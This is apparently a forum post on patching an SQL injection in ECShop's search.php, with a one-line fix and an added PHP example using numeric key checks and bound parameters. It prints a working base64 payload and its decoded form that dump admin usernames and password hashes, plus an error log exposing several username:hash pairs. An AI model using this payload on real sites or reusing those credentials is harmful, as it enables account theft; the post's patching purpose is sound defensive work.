Fixing the SQL injection in ECShop's search
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code
The string after base64_decode:
a:1:{s:4:"attr";a:1:{s:125:"1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"\') union select 1#"'),1 from ecs_admin_user#";s:1:"1";}}
Saw this on a 0day site today. Tested it on a local 2.7.2 install and it dumps the data straight out... Hope everyone takes note and patches it as soon as possible. I only recently moved from C# to PHP and don't have the skills for this, so I hope an expert can patch it properly. The impact is fairly significant!
MySQL server error report:Array( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT g.goods_id, g.goods_name, g.market_price, g.is_new, g.is_best, g.is_hot, g.shop_price AS org_price, IFNULL(mp.user_price, g.shop_price * '1') AS shop_price, g.promote_price, g.promote_start_date, g.promote_end_date, g.goods_thumb, g.goods_img, g.goods_brief, g.goods_type FROM `ecshop`.`ecs_goods` AS g LEFT JOIN `ecshop`.`ecs_member_price` AS mp ON mp.goods_id = g.goods_id AND mp.user_rank = '0' WHERE g.is_delete = 0 AND g.is_on_sale = 1 AND g.is_alone_sale = 1 AND g.goods_id IN ('dsktt:f1848c3adc916b8ccf6759ae29f5bfe8"') union select 1#"','bjgonghuo1:d0c015b6eb9a280f318a4c0510581e7e"') union select 1#"','shhaigonghuo1:4146fecce77907d264f6bd873f4ea27b"') union select 1#"') AND (( 1 ) ) ORDER BY goods_id DESC LIMIT 10 ) [2] => Array ( [error] => The used SELECT statements have a different number of columns ) [3] => Array ( [errno] => 1222 ))
Solution
search.php
Around line 300 of the source, the line
if (is_not_null($val) )
should be changed to
if (is_not_null($val) && is_numeric($key))
and that is all it takes: the injected SQL sits in the array key of the attr parameter, which the original check never examined, so requiring a numeric key rejects it before the query is built.
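As an added example (not ECShop's own code and not the author's patch), here is one way to write the attribute loop so that neither the key nor the value of the attr array can carry SQL: keys are whitelisted to integers and values are passed as bound parameters. The table and column names (ecs_goods_attr, attr_id, attr_value) and the PDO usage are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not ECShop's own code. Assumed schema: ecs_goods_attr(attr_id, attr_value, goods_id).
// Builds the attribute-filter query from the decoded `attr` request array.
// Keys are whitelisted to integers (the payload above lives in the key, which the
// original `is_not_null($val)` check never looked at); values become bound parameters.
function build_attr_filter(array $attr): array
{
    $clauses = [];
    $params  = [];
    foreach ($attr as $key => $val) {
        // Drop entries whose key is not an attribute id or whose value is empty or non-scalar.
        if (!is_numeric($key) || !is_scalar($val) || trim((string) $val) === '') {
            continue;
        }
        $clauses[] = '(attr_id = ? AND attr_value = ?)';
        $params[]  = (int) $key;
        $params[]  = (string) $val;
    }
    if ($clauses === []) {
        return ['', []];   // nothing to filter on; the caller skips the attribute lookup
    }
    $sql = 'SELECT goods_id FROM ecs_goods_attr WHERE ' . implode(' OR ', $clauses);
    return [$sql, $params];
}

// Constructed inputs: an ordinary request, and a request with SQL in the key
// (the shape of the decoded payload above, shortened).
$normal  = ['3' => 'red', '7' => 'XL'];
$hostile = ["1') and 1=2 GROUP BY goods_id#" => '1'];

foreach (['normal' => $normal, 'hostile' => $hostile] as $label => $input) {
    [$sql, $params] = build_attr_filter($input);
    echo "$label: ", $sql === '' ? '(rejected, no query built)' : $sql, "\n";
    echo '  params: ', json_encode($params), "\n";
}

// With a PDO connection the query is run as a prepared statement (assumed usage):
// $stmt = $pdo->prepare($sql); $stmt->execute($params); $ids = $stmt->fetchAll(PDO::FETCH_COLUMN);
```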